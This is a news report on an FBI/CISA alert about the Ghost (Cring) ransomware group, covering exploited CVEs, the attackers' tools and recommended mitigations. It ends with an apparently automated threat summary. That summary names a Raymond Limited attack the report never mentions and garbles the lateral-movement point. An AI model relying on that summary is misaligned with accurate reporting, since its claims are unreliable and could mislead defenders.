Full Report
A Ghost ransomware group also referred to as Cring, has been actively exploiting vulnerabilities in software and firmware as recently as January 2025, according to an alert issued Wednesday by the Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA). Operating from China, Ghost has been targeting internet-facing services with unpatched security flaws—some of which could have been mitigated years ago. Cybersecurity researchers first detected the group's activities in 2021, and their recent attacks continue to compromise organizations across more than 70 countries, including within China itself. Scope of the Threat The alert, released in collaboration with the Multi-State Information Sharing and Analysis Center (MS-ISAC), highlights Ghost’s focus on vulnerabilities in: Unpatched Fortinet security appliances Adobe ColdFusion web application servers Microsoft Exchange servers exposed to ProxyShell attack chain vulnerabilities These vulnerabilities enable Ghost to breach systems, deploy ransomware, and demand financial payments from victims. The FBI, CISA, and MS-ISAC emphasized that the group's targets include critical infrastructure, healthcare facilities, educational institutions, government networks, religious organizations, technology firms, manufacturing companies, and small- to medium-sized businesses. Ghost Ransomware: Tactics, Techniques, and Procedures (TTPs) Ghost actors have developed various strategies to evade detection and complicate attribution. They frequently rotate their ransomware executable payloads, modify ransom note texts, switch file extensions for encrypted files, and use multiple ransom email addresses. As a result, cybersecurity experts have associated different names with the group over time, including Ghost, Cring, Crypt3r, Phantom, Strike, Hello, Wickrme, HsHarada, and Rapture. Exploitation and Attack Methods Ghost ransomware actors rely on publicly available code to exploit well-known Common Vulnerabilities and Exposures (CVEs), often in systems where patches have not been applied. Some of the vulnerabilities they have actively exploited include: Fortinet FortiOS (CVE-2018-13379) Adobe ColdFusion (CVE-2010-2861, CVE-2009-3960) Microsoft SharePoint (CVE-2019-0604) Microsoft Exchange (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207) – ProxyShell attack chain vulnerabilities Upon gaining access, Ghost actors deploy malicious tools such as Cobalt Strike Beacon malware to implant themselves within victim networks. They often upload web shells to compromised servers, leveraging Windows Command Prompt and PowerShell to execute further attacks. Persistence and Privilege Escalation While Ghost actors typically only spend a few days within a victim’s network before deploying ransomware, they have been observed creating new local and domain accounts, modifying existing account passwords, and deploying additional web shells. To escalate privileges, they exploit weaknesses in system configurations and use publicly available tools like SharpZeroLogon, SharpGPPPass, BadPotato, and GodPotato. By impersonating the SYSTEM user, they can run their malicious software with elevated privileges, allowing them to cause maximum disruption. Impact and Financial Motivation Ghost’s primary goal is financial gain. Ransom demands have varied widely, sometimes reaching hundreds of thousands of dollars. However, Ghost actors tend to abandon attempts when faced with hardened security systems that restrict lateral movement across networks. The impact of Ghost ransomware attacks differs on a case-by-case basis. While some organizations experience data encryption and operational disruptions, others with robust backup and recovery solutions have managed to restore operations without paying a ransom. Recommended Mitigations The FBI, CISA, and MS-ISAC strongly urge organizations to take the following steps to mitigate the risks associated with Ghost ransomware attacks: 1. Implement Regular System Backups Maintain known-good backups that are stored offline or segmented from source systems. Ensure that backup solutions cannot be altered or encrypted by potentially compromised network devices. 2. Patch Known Vulnerabilities Apply timely security updates to operating systems, software, and firmware. Prioritize patching vulnerabilities actively exploited by Ghost: CVE-2018-13379 (Fortinet FortiOS) CVE-2010-2861, CVE-2009-3960 (Adobe ColdFusion) CVE-2021-34473, CVE-2021-34523, CVE-2021-31207 (Microsoft Exchange – ProxyShell) 3. Segment Networks to Restrict Lateral Movement Separate critical assets from less sensitive parts of the network. Limit access to essential services through securely configured VPNs or firewalls. 4. Enforce Multi-Factor Authentication (MFA) Require phishing-resistant MFA for privileged accounts and email services. Monitor for unauthorized changes to authentication mechanisms. 5. Enhance Email Security Deploy advanced email filtering to block phishing attempts. Implement DMARC, DKIM, and SPF to prevent email spoofing. 6. Monitor for Unauthorized PowerShell Use Ghost actors heavily rely on PowerShell for malicious operations. Restrict PowerShell access to only essential users. Implement PowerShell allowlisting for scripts and network traffic. 7. Identify and Investigate Abnormal Network Activity Watch for unusual commands, scripts, and network traffic patterns. Conduct regular scans to detect unauthorized account modifications. 8. Disable Unused Services and Ports Close unnecessary ports like RDP (3389), FTP (21), and SMB (445). Restrict the exposure of internal services to external networks. Conclusion Ghost ransomware remains a persistent threat to organizations worldwide, with attacks escalating as vulnerabilities in outdated software remain unpatched. By implementing the recommended security measures, organizations can significantly reduce the likelihood of falling victim to this financially motivated cybercriminal group. The FBI, CISA, and MS-ISAC continue to monitor Ghost’s activities and urge organizations to stay vigilant, apply patches promptly, and bolster cybersecurity defenses against evolving ransomware threats.
Analysis Summary
# Threat Actor: Ghost Ransomware Group
## Attribution & Identity
* **Alias/Name:** Ghost Ransomware Group
* **Association:** Described as a financially motivated cybercriminal group. The FBI, CISA, and MS-ISAC are monitoring their activities.
## Activity Summary
* The group is actively conducting ransomware attacks, exploiting unpatched software as a primary initial access vector.
* The article highlights ongoing attacks that warrant vigilance from organizations worldwide.
* Recent confirmation of a cyberattack on Raymond Limited is mentioned in associated headlines, suggesting this group (or the general threat environment they contribute to) is active against corporate entities.
## Tactics, Techniques & Procedures
* **Initial Access:** Exploiting unpatched software vulnerabilities.
* **Execution/Defense Evasion:** Heavy reliance on PowerShell for malicious operations.
* **Lateral Movement:** Attacks aim to restrict lateral movement through network segmentation compromise.
* **Impact:** Encryption/Ransomware deployment (implied by the group's name).
* **TTPs Mentioned:**
* Exploiting unpatched software.
* Heavy reliance on PowerShell for malicious operations.
* Lateral movement within the network.
## Targeting
* **Sectors:** General organizations worldwide (implied, explicitly noted that they remain a "persistent threat to organizations worldwide"). The presence of a headline regarding "Raymond Limited Confirms Cyberattack" suggests the manufacturing/corporate sector is a specific target.
* **Geography:** Worldwide.
* **Victims:** Raymond Limited (confirmed cyberattack mentioned in associated news).
## Tools & Infrastructure
* **Malware Families Used:** Ghost Ransomware (primary tool).
* **Infrastructure:** Not explicitly detailed beyond the operational use of PowerShell.
## Implications
Ghost Ransomware is identified as a persistent and ongoing threat. Their reliance on exploiting known, unpatched vulnerabilities suggests that a significant portion of successful intrusions could be prevented through standard vulnerability and patch management hygiene. Their activity is significant enough to warrant public alerts from major US cyber defense agencies (FBI, CISA).
## Mitigations
Recommendations focus heavily on hardening network defenses against known attack patterns:
* Prioritize patching, especially for internet-facing applications.
* Implement Zero Trust principles to restrict lateral movement.
* Enforce phishing-resistant Multi-Factor Authentication (MFA) for privileged accounts and email services.
* Enhance email security (DMARC, DKIM, SPF) to block phishing.
* **Restrict PowerShell Access:** Limit PowerShell access to essential users, implement PowerShell allowlisting for scripts and network traffic.
* Monitor for unusual scripts, commands, and network traffic.
* Disable unnecessary services and close insecure ports (RDP 3389, FTP 21, SMB 445).